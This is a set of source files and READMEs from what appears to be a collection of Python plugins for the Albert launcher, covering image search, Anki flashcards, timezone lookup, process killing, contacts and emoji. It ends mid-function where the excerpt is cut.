def defaultTrigger(self):
return "img "
def synopsis(self):
return "search text"
def initialize(self):
"""Called when the extension is loaded (ticked in the settings) - blocking."""
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def get_as_item(self, query, result: BingImage):
"""Return an item.
Will return None if the link to the image is not reachable (e.g., on 404)
"""
try:
img = str(result.image.absolute())
except subprocess.CalledProcessError:
v0.debug(f"Could not fetch item -> {result.url}")
return None
actions = [
ClipAction("Copy url", result.url),
ClipAction("Copy local path to image", img),
UrlAction("Open in browser", result.url),
]
if result.type != "gif":
actions.insert(
0, FuncAction("Copy image", lambda result=result: copy_image(result))
)
item = v0.Item(
id=f"{md_name}_{hash(result)}",
icon=[str(result.thumbnail)],
text=result.url[-20:],
subtext=result.type,
completion=f"{query.trigger}",
actions=actions,
)
return item
def handleQuery(self, query) -> None:
"""Hook that is called by albert with *every new keypress*.""" # noqa
try:
query_str = query.string
            if len(query_str) < 2:
                keys_monitor.reset()
                return
keys_monitor.reset()
keys_monitor.report()
if not keys_monitor.triggered():
return
bing_images = list(bing_search_set_download(query=query_str, limit=3))
if not bing_images:
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="No images found",
subtext=f"Query: {query_str}",
),
)
return
query.add(self.get_bing_results_as_items(query, bing_images))
except Exception: # user to report error
print(traceback.format_exc())
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
def get_bing_results_as_items(self, query, bing_results: List[BingImage]):
"""Get bing results as Albert items ready to be rendered in the UI."""
# TODO Seems to only run in a single thread?!
with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
futures = {
executor.submit(self.get_as_item, query, result): "meanings"
for result in bing_results
}
items = []
for future in concurrent.futures.as_completed(futures):
future_res = future.result()
if future_res is not None:
items.append(future_res)
return items
<file_sep># Awesome Albert Plugins
<a href="https://travis-ci.com/bergercookie/awesome-albert-plugins" alt="Build Status">
<img src="https://travis-ci.com/bergercookie/awesome-albert-plugins.svg?branch=master"></a>
<a href="https://www.codacy.com/manual/bergercookie/awesome-albert-plugins">
<img src="https://api.codacy.com/project/badge/Grade/dbefc49bb5f446488da561c7497bb821"/></a>
<a href=https://github.com/bergercookie/awesome-albert-plugins/blob/master/LICENSE alt="LICENCE">
<img src="https://img.shields.io/github/license/bergercookie/awesome-albert-plugins.svg" /></a>
<a href="https://github.com/psf/black">
<img alt="Code style: black" src="https://img.shields.io/badge/code%20style-black-000000.svg"></a>
## Description
This is a collection of plugins and themes for the
[Albert](https://albertlauncher.github.io/) launcher. It strives to be up to
date with the latest state of the Albert launcher and its Python API. In case of
an older albert version, see the branches of this repo.
## Demos
|  |  |
| :----------------------------------------------------------------------------------------------------------------- | :----------------------------------------------------------------------------------------------------------------: |
|  |  |
|  |  |
|  |  |
|  |  |
|  |  |
|  |  |
|  |  |
|  |  |
|  |  |
|  |  |
|  |  |
## Plugins
Currently the list of plugins includes:
- [Abbreviations](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/anki) - ❗Lookup words stored in a file along with their description
- [Anki](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/anki) - 📇 Generate flashcards for [Anki](https://apps.ankiweb.net/)
- [Bluetooth](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/bluetooth) - 🦷 Manage bluetooth devices
- [Clock](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/clock) - ⏰ Create countdown and stopwatch timers
- [Contacts](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/contacts) - 📕 View your contacts and copy emails/telephones, etc.
- [Colors](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/colors) - 🎨 Color lookup using RGB, hex notation or color name
- [Emoji](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/emoji) - 🎉 Search for and copy emojis to clipboard
- [Errno](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/errno_lookup) - ❗Lookup and get information on Linux error codes
- [Google Translate](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/google_translate) - 🉑 Reimplementation of [this](https://github.com/dshoreman/albert-translate) plugin with persistent storage of previous searches, no need for API key and smart HTTP querying to avoid blocking from Google.
- [Harakiri](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/harakiri) - 📫 Create temporary email addresses at [harakirimail.com](https://harakirimail.com/)
- [IP show](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/ipshow) - 🌐 Display information about your network interfaces and public IPs
- [Image Search](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/image_search) - 📷 Search the web for images, download them and/or copy them to clipboard
- [Jira](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/jira) - 📝 View and edit your [Jira](https://www.atlassian.com/software/jira) tickets from Albert
- [Killproc](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/killproc) - ☠️ Kill processes based on fuzzy-search
- [Meme Generator](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/meme_generator) - 😸 Generate memes and copy them to clipboard
- [Pass TOTP](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/pass_totp_cli) - 🔢 Generate 2FA codes with [Pass](https://www.passwordstore.org/) and [totp](https://pypi.org/project/totp/)
- [Pass_rlded](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/pass_rlded) - 🔒 UNIX Password Manager interaction with fuzzy-search capabilities
- [Pulse Control](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/pulse_control) - 🎤 Enable/disable sources and sinks from Pulse Control
- [Remmina](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/remmina) - 🖥️ Start a [Remmina](https://remmina.org/) VNC/SFTP connection
- [Saxophone](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/saxophone) - 🎷 Play your favorite internet radio stations / streams
- [Scratchpad](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/scratchpad) - 📝 Take quick notes into a single textfile
- [Taskwarrior](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/taskwarrior) - 🪖 Interact with the [Taskwarrior](https://taskwarrior.org/) task manager
- [Template Albert Plugin](https://github.com/bergercookie/awesome-albert-plugins) - 🛠️ Template [cookiecutter](https://github.com/cookiecutter/cookiecutter) for creating new Albert plugins
- [Timezones](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/timezones) - 🌏 Lookup timezone information
- [Tldr Lookup](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/tldr_pages) - Lookup [tldr](https://github.com/tldr-pages/tldr) pages and commands
- [URL Error Lookup](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/url_lookup) - 🔗 Lookup URL error codes
- [Words](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/words) - 🔤 Lookup a word definition, synonyms and antonyms
- [Xkcd](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/xkcd) - 📓 List and fuzzy-search the latest [xkcd](https://fr.wikipedia.org/wiki/Xkcd) comics
- [`DuckDuckGo`-based autocompletion search](https://github.com/bergercookie/awesome-albert-plugins#ddgr-based-plugins) - 🦆 for searching on duckduckgo.com, github.com,
stackoverflow, amazon, and a variety of other websites using [ddgr](https://github.com/jarun/ddgr)
- Suggestions-enabled search using [ddgr](https://github.com/jarun/ddgr) on
a variety of websites. For example:
- DuckDuckGo
- Amazon
- Youtube
- Github
- Ebay
- Imdb
- Urban dictionary: Word/Slang definitions lookup
- Python, OpenCV, Dlib, C++ documentation lookup
- ...
- :warning: To avoid getting blocked, a search request is only sent when the
text ends with a dot `"."`.
- Install `google-chrome` or `chromium-browser` to add an "Open in incognito
mode" option
- See the [`ddgr`-specific section](#ddgr-based-plugins) for more details
Plugins have been tested with the Albert python `v0.4` interface. If you're
looking for a version that works with earlier versions of the Python interface,
see the `prior-to-v0.4` branch. I'm using Python `3.6.8`.
## Themes
- [Mozhi](https://github.com/Hsins/Albert-Mozhi) - A flat, transparent and dark
theme for Albert.
([DEMO](https://github.com/Hsins/Albert-Mozhi/blob/master/demo/demo.gif))
## Motivation
It's really so easy writing plugins and automating parts of your workflow using
Albert and its python extensions. That's the very reason I started writing them.
## Installation
Requirements:
- Linux (tested on Ubuntu)
- Albert - [Installation instructions](https://albertlauncher.github.io/docs/installing/)
- Albert Python Interface: `v0.4`
Clone this repository under your local Albert python plugins directory. By
default, that is: `~/.local/share/albert/org.albert.extension.python/modules`.
Then go to the Albert settings and enable the plugins that you are interested in
using. Beware that you may need to install additional dependencies depending on
the plugins you use. These dependencies will probably be pointed out either when
you enable the plugin, or when you run it for the first time. Refer to the
directory of the corresponding plugin for more details.
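For example, assuming the default modules directory:

```sh
git clone https://github.com/bergercookie/awesome-albert-plugins \
  ~/.local/share/albert/org.albert.extension.python/modules/awesome-albert-plugins
```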
### `ddgr`-based plugins
The search plugins that use `ddgr` have not been committed to this repo. You
can generate them offline using the `create_ddgr_plugins.py` script provided.
Make sure you have Python >= 3.6 installed:
```sh
pip3 install --user --upgrade secrets requests ddgr cookiecutter
./create_ddgr_plugins.py
```
This will generate an Albert plugin for each one of the search engines specified
in `create_ddgr_plugins.py`. Adjust the latter as required if you want to
add more or remove plugins.
```py
generate_plugins_only_for = [
"alternativeto",
"amazon",
"askubuntu",
"aur.archlinux",
...
]
```
### I don't want to setup all the plugins, just a few
Very well, then after cloning this repo, just symlink or copy the plugin of
choice under your local python plugins directory. For example for the `jira`
plugin:
```sh
cp -r plugins/jira ~/.local/share/albert/org.albert.extension.python/modules/jira
```
After that, enable the plugin from the Albert settings.
## Self Promotion
If you find this tool useful, please [star it on
Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues)
for the things that I'm currently either working on or interested in
implementing in the near future. In case there's something you are interested
in working on, don't hesitate to either ask for clarifications or just do it and
directly make a PR.
### Ideas List (feel free to implement)
- :construction: Giphy - https://github.com/Giphy/giphy-python-client
- :construction: Devdocs.io/Zeal/Dash search
- :construction: Manage your VPN connections - Frontend to `WireGuard`?
- :construction: Spotify mini player - similar to [this](https://github.com/vdesabou/alfred-spotify-mini-player)
- :construction: Movie search and ratings - be able to sign in to various
  services (e.g., imdb) and submit a rating for a movie
- :construction: An alternative to [Alfred's pkgman](https://github.com/willfarrell/alfred-pkgman-workflow)
- :construction: Vagrant start/stop boxes - see [this](https://github.com/m1keil/alfred-vagrant-workflow)
- :construction: Assembly instructions lookup - use [this](https://github.com/asmjit/asmdb)
<file_sep>"""Create new anki cards fast."""
import json
import re
import traceback
from pathlib import Path
from typing import Any, Callable, Optional, Tuple
import albert as v0
import httpx
from gi.repository import GdkPixbuf, Notify
md_name = "Anki"
md_description = "Anki Interaction - Create new anki cards fast"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/anki"
md_bin_dependencies = ["anki"]
md_lib_dependencies = ["httpx", "fuzzywuzzy"]
notif_title = "Anki Interaction" # Custom metadata
icon_path = str(Path(__file__).parent / "anki")
cache_path = Path(v0.cacheLocation()) / "anki"
config_path = Path(v0.configLocation()) / "anki"
data_path = Path(v0.dataLocation()) / "anki"
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
AVAIL_NOTE_TYPES = {
"basic": "Basic",
"basic-reverse": "Basic (and reversed card)",
"cloze": "Cloze",
}
curr_trigger: str = ""
# FileBackedVar class -------------------------------------------------------------------------
class FileBackedVar:
def __init__(self, varname: str, convert_fn: Callable = str, init_val: Any = None):
self._fpath = config_path / varname
self._convert_fn = convert_fn
        # initialise the file backing this variable; this may run before the
        # plugin's initialize() hook
if init_val:
with open(self._fpath, "w") as f:
f.write(str(init_val))
else:
self._fpath.touch()
def get(self):
with open(self._fpath, "r") as f:
return self._convert_fn(f.read().strip())
def set(self, val):
with open(self._fpath, "w") as f:
return f.write(str(val))
deck_name = FileBackedVar(varname="deck_name", init_val="scratchpad")
# interact with ankiconnect -------------------------------------------------------------------
def anki_post(action, **params) -> Any:
def request(action, **params):
return {"action": action, "params": params, "version": 6}
req_json = json.dumps(request(action, **params)).encode("utf-8")
response = httpx.post(url="http://localhost:8765", content=req_json).json()
if len(response) != 2:
raise RuntimeError("Response has an unexpected number of fields")
if "error" not in response:
raise RuntimeError("Response is missing required error field")
if "result" not in response:
raise RuntimeError("Response is missing required result field")
if response["error"] is not None:
raise RuntimeError(response["error"])
return response["result"]
# plugin main functions -----------------------------------------------------------------------
def add_anki_note(note_type: str, **kargs):
"""
:param kargs: Parameters passed directly to the "notes" section of the POST request
"""
deck = deck_name.get()
# make sure that the deck is already created, otherwise adding the note will fail
anki_post("createDeck", deck=deck)
if note_type not in AVAIL_NOTE_TYPES.values():
raise RuntimeError(f"Unexpected note type -> {note_type}")
params = {
"action": "addNotes",
"notes": [
{
"deckName": deck,
"modelName": note_type,
"tags": ["albert"],
}
],
}
params["notes"][0].update(kargs)
resp = anki_post(**params)
if resp[0] is None:
notify(f"Unable to add new note, params:\n\n{params}")
# supplementary functions ---------------------------------------------------------------------
def notify(
msg: str,
app_name: str = notif_title,
image=str(icon_path),
):
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
n.show()
def get_as_item(**kargs) -> v0.Item:
if "icon" in kargs:
icon = kargs.pop("icon")
else:
icon = icon_path
return v0.Item(id=notif_title, icon=[icon], **kargs)
def sanitize_string(s: str) -> str:
    return s.replace("<", "&lt;")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
# subcommands ---------------------------------------------------------------------------------
class Subcommand:
def __init__(self, *, name, desc):
self.name = name
self.desc = desc
def get_as_albert_item(self, *args, **kargs):
return get_as_item(
text=self.desc, completion=f"{curr_trigger}{self.name} ", *args, **kargs
)
def get_as_albert_items_full(self, query_str: str):
return [self.get_as_albert_item()]
def __str__(self) -> str:
return f"Name: {self.name} | Description: {self.desc}"
class ChangeDeck(Subcommand):
usage_str = "Type the new deck name"
def __init__(self):
super(ChangeDeck, self).__init__(
name="change-deck", desc="Change the default deck to dump new notes to"
)
def get_as_albert_items_full(self, query_str: str):
item = self.get_as_albert_item(
subtext=ChangeDeck.usage_str if not query_str else f"Deck to use: {query_str}",
actions=[
FuncAction(
"Change deck",
lambda new_deck_name=query_str: ChangeDeck.change_to(new_deck_name),
)
],
)
return [item]
@staticmethod
def change_to(new_deck_name: str):
# check that that deck exists already:
avail_decks = anki_post("deckNames")
if new_deck_name not in avail_decks:
notify(
"Given deck doesn't exist. Try again with one of the following"
f" names:\n\n{avail_decks}"
)
return
global deck_name
deck_name.set(new_deck_name)
notify(f"New deck name: {deck_name.get()}")
class AddClozeNote(Subcommand):
usage_str = "USAGE: Add text including notations like {{c1::this one}}"
def __init__(self):
super(AddClozeNote, self).__init__(
name="cloze",
desc="Add a new cloze note. Use {{c1:: ... }}, {{c2:: ... }} and so forth",
)
def get_as_albert_items_full(self, query_str: str):
if self.detect_cloze_note(query_str):
subtext = query_str
else:
subtext = AddClozeNote.usage_str
actions = [
FuncAction(
"Add a new cloze note",
lambda cloze_text=query_str: self.add_cloze_note(cloze_text=cloze_text),
)
]
item = self.get_as_albert_item(subtext=subtext, actions=actions)
return [item]
def detect_cloze_note(self, cloze_text: str):
return re.search("{{.*}}", cloze_text)
def add_cloze_note(self, cloze_text: str):
if not self.detect_cloze_note(cloze_text):
notify(f"Not a valid cloze text: {cloze_text}")
return
add_anki_note(
note_type="Cloze",
fields={"Text": cloze_text, "Extra": ""},
options={"clozeAfterAdding": True},
)
class AddBasicNote(Subcommand):
usage_str = "USAGE: front content | back content"
def __init__(self, with_reverse):
if with_reverse:
self.name = "basic-reverse"
self.note_type = AVAIL_NOTE_TYPES[self.name]
else:
self.name = "basic"
self.note_type = "Basic"
super(AddBasicNote, self).__init__(name=self.name, desc=f"Add a new {self.name} note")
def get_as_albert_items_full(self, query_str: str):
query_parts = AddBasicNote.parse_query_str(query_str)
if query_parts:
front = query_parts[0]
back = query_parts[1]
subtext = f'{front} | {back}'
else:
subtext = AddBasicNote.usage_str
actions = [
FuncAction(
f"Add {self.name} Note",
lambda query_str=query_str: self.add_anki_note(query_str),
)
]
item = self.get_as_albert_item(subtext=subtext, actions=actions)
return [item]
@staticmethod
def parse_query_str(query_str: str) -> Optional[Tuple[str, str]]:
"""Parse the front and back contents. Return None if parsing fails."""
sep = "|"
if sep not in query_str:
return
parts = query_str.split("|")
if len(parts) != 2:
return
return parts # type: ignore
def add_anki_note(self, query_str: str):
parts = AddBasicNote.parse_query_str(query_str)
if parts is None:
notify(msg=AddBasicNote.usage_str)
return
front, back = parts
add_anki_note(note_type=self.note_type, fields={"Front": front, "Back": back})
class SubcommandQuery:
def __init__(self, subcommand: Subcommand, query: str):
"""
Query for a specific subcommand.
:query: Query text - doesn't include the subcommand itself
"""
self.command = subcommand
self.query = query
def __str__(self) -> str:
return f"Command: {self.command}\nQuery Text: {self.query}"
def create_subcommands():
return [
AddBasicNote(with_reverse=False),
AddBasicNote(with_reverse=True),
AddClozeNote(),
ChangeDeck(),
]
subcommands = create_subcommands()
def get_subcommand_for_name(name: str) -> Optional[Subcommand]:
"""Get a subcommand with the indicated name."""
matching = [s for s in subcommands if s.name.lower() == name.lower()]
if matching:
return matching[0]
def get_subcommand_query(query_str: str) -> Optional[SubcommandQuery]:
"""
    Determine whether the current query invokes a subcommand.
    If so, return the corresponding SubcommandQuery object.
"""
if not query_str:
return None
    # split:
    # "subcommand_name rest of query" -> ["subcommand_name", "rest of query"]
query_parts = query_str.strip().split(None, maxsplit=1)
if len(query_parts) < 2:
query_str = ""
else:
query_str = query_parts[1]
subcommand = get_subcommand_for_name(query_parts[0])
if subcommand:
return SubcommandQuery(subcommand=subcommand, query=query_str)
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "anki "
def synopsis(self):
return "new card content"
def initialize(self):
pass
def finalize(self):
pass
def handleQuery(self, query) -> None:
"""Hook that is called by albert with *every new keypress*.""" # noqa
results = []
global curr_trigger
curr_trigger = query.trigger
try:
query_str = query.string
if len(query_str) < 2:
results.extend([s.get_as_albert_item() for s in subcommands])
else:
subcommand_query = get_subcommand_query(query_str)
if subcommand_query:
results.extend(
subcommand_query.command.get_as_albert_items_full(
subcommand_query.query
)
)
except Exception: # user to report error
v0.critical(traceback.format_exc())
results.insert(
0,
v0.Item(
id=notif_title,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
query.add(results)
<file_sep># words - Albert plugin
## Description
Get definitions, synonyms and antonyms for the given word - uses
<https://synonyms.com> under the hood.
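Roughly, the plugin performs lookups like the following minimal sketch (the
printed output shapes are illustrative):

```python
# Minimal sketch of the lookups the plugin performs via PyDictionary.
from PyDictionary import PyDictionary

pd = PyDictionary()
print(pd.meaning("obnoxious"))   # e.g., {'Adjective': [...]}
print(pd.synonym("obnoxious"))   # e.g., ['objectionable', ...]
print(pd.antonym("obnoxious"))   # e.g., ['agreeable', ...]
```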
## Demo
|  |  |
## Installation instructions
Makes use of [pydictionary](https://github.com/geekpradd/PyDictionary):
`pip3 install --user --upgrade pydictionary`
Refer to the parent project: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interested in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep># killproc - Albert plugin
## Description
Kill process(es) from Albert
- Search for a process using fuzzy search
- A few different modes to choose from:
- Terminate/Kill the selected process
- Terminate/Kill processes with a matching name
- Terminate/Kill processes based on the provided glob search. For example
`sle*` will kill all the processes that start with `sle` regardless of the
currently selected process
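The glob mode, for instance, boils down to something like this sketch
(mirroring the plugin's own use of `fnmatch` and `psutil`; the pattern and
signal are illustrative):

```python
# Sketch of the "terminate by glob" mode: match process command lines
# against a shell-style glob and SIGTERM the matches.
import fnmatch
import re
import signal

import psutil

pat = re.compile(fnmatch.translate("sle*"))
for p in psutil.process_iter():
    try:
        if pat.search(" ".join(p.cmdline())):
            p.send_signal(signal.SIGTERM)
    except psutil.NoSuchProcess:
        pass  # process exited while iterating
```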
## Demo

## Installation instructions
The following `import` statements should succeed:
```python
import psutil
from fuzzywuzzy import process
from gi.repository import GdkPixbuf, Notify
```
Refer to the parent project for more: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interested in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep># contacts - Albert plugin
## Description
View and copy information from your contacts using
[Albert](https://albertlauncher.github.io/installing/).
To setup:
- Install [vcfxplr](https://github.com/bergercookie/vcfxplr)
- Download your contacts in the `VCF` format. Your contacts provider should have
an export function, e.g., for Google see
[here](https://support.google.com/contacts/answer/7199294?hl=en-GB&co=GENIE.Platform%3DDesktop)
- Enable the plugin as usual (see [parent
project](https://github.com/bergercookie/awesome-albert-plugins) for more).
- On the first run, trigger the plugin with `c<space>` and point it to the
  location of the downloaded vcf file. On subsequent runs it should be ready to go.

You should be able to fuzzy-search through your contacts based on the contact's
full names and once you've found the contact you're looking for you should be
able to copy one of their emails, telephone numbers or full name.

## Demo

## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues)
for the things that I'm currently either working on or interested in
implementing in the near future. In case there's something you are interested
in working on, don't hesitate to either ask for clarifications or just do it and
directly make a PR.
<file_sep># image_search - Albert plugin
## Description
Lookup images directly from the Albert prompt. Download them locally, or copy
them directly to clipboard so that you can instantly send them to friends on
social media!
Under the hood it uses Bing and Beautiful Soup.
## Demo
|  |  |  |

## Installation instructions
On Linux, the following programs must be in your path:
* `xclip`
* `convert` (from imagemagick)
You also have to install `beautifulsoup4` via `pip3` for parsing results from Bing.
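For example, on a Debian-based distro the following should cover the above
(package names assumed):

```sh
sudo apt install xclip imagemagick
pip3 install --user --upgrade beautifulsoup4
```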
Refer to the parent project for more installation instructions if required: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interested in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep># emoji - Albert plugin
## Description
The `emojis` Albert plugin allows you to quickly lookup and copy various emojis
to your clipboard
Thanks to @hugovk for providing the
[em-keyboard](https://github.com/hugovk/em-keyboard) tool. I'm using that for
the list of emojis as well as their labels.
This plugin supports fuzzy search on both the vanilla emojis of `em-keyboard` as
well as custom emojis in `JSON` format added under `~/.emojis.json`.
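For instance, a custom emoji could be registered with something like the
following sketch; the `{emoji: [labels, ...]}` shape mirrors what
`em.parse_emojis()` returns, but treat the exact schema as an assumption:

```python
# Sketch: register a custom emoji for the plugin to pick up on re-index.
import json
from pathlib import Path

custom = {"🦄": ["unicorn", "magic"]}
Path("~/.emojis.json").expanduser().write_text(json.dumps(custom, ensure_ascii=False))
```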
## Demo
Without any keyword it shows you your most recently used emojis on top:

On additional key presses it allows for fuzzy search on the labels of each emoji:
|  |  |
| :----------------------------------------------------------------------------------------------------------------: | :----------------------------------------------------------------------------------------------------------------: |
## Installation instructions
### Prerequisites
#### Exec prerequisites
- `xclip`: you must have `xclip` installed; ensure that its path is in the `PATH` environment variable.
##### Python prerequisites
- `em-keyboard`: [link to repository](https://github.com/hugovk/em-keyboard)
- `fuzzywuzzy`
Install all dependencies via `pip3`:
```bash
pip3 install em-keyboard fuzzywuzzy
```
Refer to the parent project for more information: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interested in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep>"""Timezones lookup."""
import concurrent.futures
import time
import traceback
from datetime import datetime
from pathlib import Path
import albert as v0 # type: ignore
import pycountry
import pytz
import requests
import tzlocal
from thefuzz import process
from PIL import Image
md_name = "Timezones"
md_description = "Timezones lookup based on city/country"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/timezones"
md_lib_dependencies = [
"Pillow",
"pycountry",
"thefuzz[speedup]",
"tzlocal==2.1",
"requests",
"pytz",
]
icon_path = str(Path(__file__).parent / "timezones")
cache_path = Path(v0.cacheLocation()) / "timezones"
config_path = Path(v0.configLocation()) / "timezones"
data_path = Path(v0.dataLocation()) / "timezones"
country_logos_path = data_path / "logos"
# country code -> cities
code_to_cities = dict({k: v for k, v in pytz.country_timezones.items()})
codes = list(code_to_cities.keys())
city_to_code = {vi: k for k, v in pytz.country_timezones.items() for vi in v}
cities = list(city_to_code.keys())
country_to_code = {c.name: c.alpha_2 for c in pycountry.countries if c.alpha_2 in codes}
country_to_cities = {
country: code_to_cities[code] for country, code in country_to_code.items()
}
countries = list(country_to_code.keys())
local_tz_str = tzlocal.get_localzone().zone
def get_pretty_city_name(city: str) -> str:
return "".join(city.split("/")[-1].split("_"))
full_name_to_city = {
f"{city_to_code[city]}{country.replace(' ', '')}{get_pretty_city_name(city)}": city
for country in countries
for city in country_to_cities[country]
}
def download_logo_for_code(code: str) -> bytes:
"""
Download the logo of the given code.
    Logs an error message if the download fails.
"""
ret = requests.get(f"https://flagcdn.com/64x48/{code.lower()}.png")
if not ret.ok:
print(f"[E] Couldn't download logo for code {code}")
return ret.content
def get_logo_path_for_code_orig(code: str) -> Path:
"""Return the path to the cached country logo"""
return country_logos_path / f"{code}-orig.png"
def get_logo_path_for_code(code: str) -> Path:
"""Return the path to the cached country logo"""
return country_logos_path / f"{code}.png"
def save_logo_for_code(code: str, data: bytes):
fname_orig = get_logo_path_for_code_orig(code)
fname = get_logo_path_for_code(code)
with open(fname_orig, "wb") as f:
f.write(data)
old_img = Image.open(fname_orig)
old_size = old_img.size
new_size = (80, 80)
new_img = Image.new("RGBA", new_size)
new_img.paste((255, 255, 255, 0), (0, 0, *new_size))
new_img.paste(
old_img, ((new_size[0] - old_size[0]) // 2, (new_size[1] - old_size[1]) // 2)
)
new_img.save(fname)
def download_and_save_logo_for_code(code):
save_logo_for_code(code, download_logo_for_code(code))
def download_all_logos():
with concurrent.futures.ThreadPoolExecutor(max_workers=100) as executor:
future_to_code = {
executor.submit(download_and_save_logo_for_code, code): code for code in codes
}
for future in concurrent.futures.as_completed(future_to_code):
code = future_to_code[future]
try:
future.result()
print(f"Fetched logo for country {code}")
except Exception as exc:
print(f"[W] Fetching logo for {code} generated an exception: {exc}")
# plugin main functions -----------------------------------------------------------------------
def get_uniq_elements(seq):
"""Return only the unique elements off the list - Preserve the order.
.. ref:: https://stackoverflow.com/questions/480214/how-do-you-remove-duplicates-from-a-list-whilst-preserving-order
"""
seen = set()
seen_add = seen.add
return [x for x in seq if not (x in seen or seen_add(x))]
# supplementary functions ---------------------------------------------------------------------
def get_as_item(city: str):
"""Return an item - ready to be appended to the items list and be rendered by Albert."""
code = city_to_code[city]
icon = str(get_logo_path_for_code(code))
utc_dt = pytz.utc.localize(datetime.utcnow())
dst_tz = pytz.timezone(city)
dst_dt = utc_dt.astimezone(dst_tz)
text = f'{dst_dt.strftime("%Y-%m-%d %H:%M %z (%Z)")}'
subtext = f"[{code}] | {city}"
return v0.Item(
id=f"{md_name}_{code}",
icon=[icon],
text=text,
subtext=subtext,
completion=city,
actions=[
UrlAction(
"Open in zeitverschiebung.net",
(
f'https://www.zeitverschiebung.net/en/timezone/{city.replace("/", "--").lower()}'
),
),
],
)
def sanitize_string(s: str) -> str:
    return s.replace("<", "&lt;")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def save_data(data: str, data_name: str):
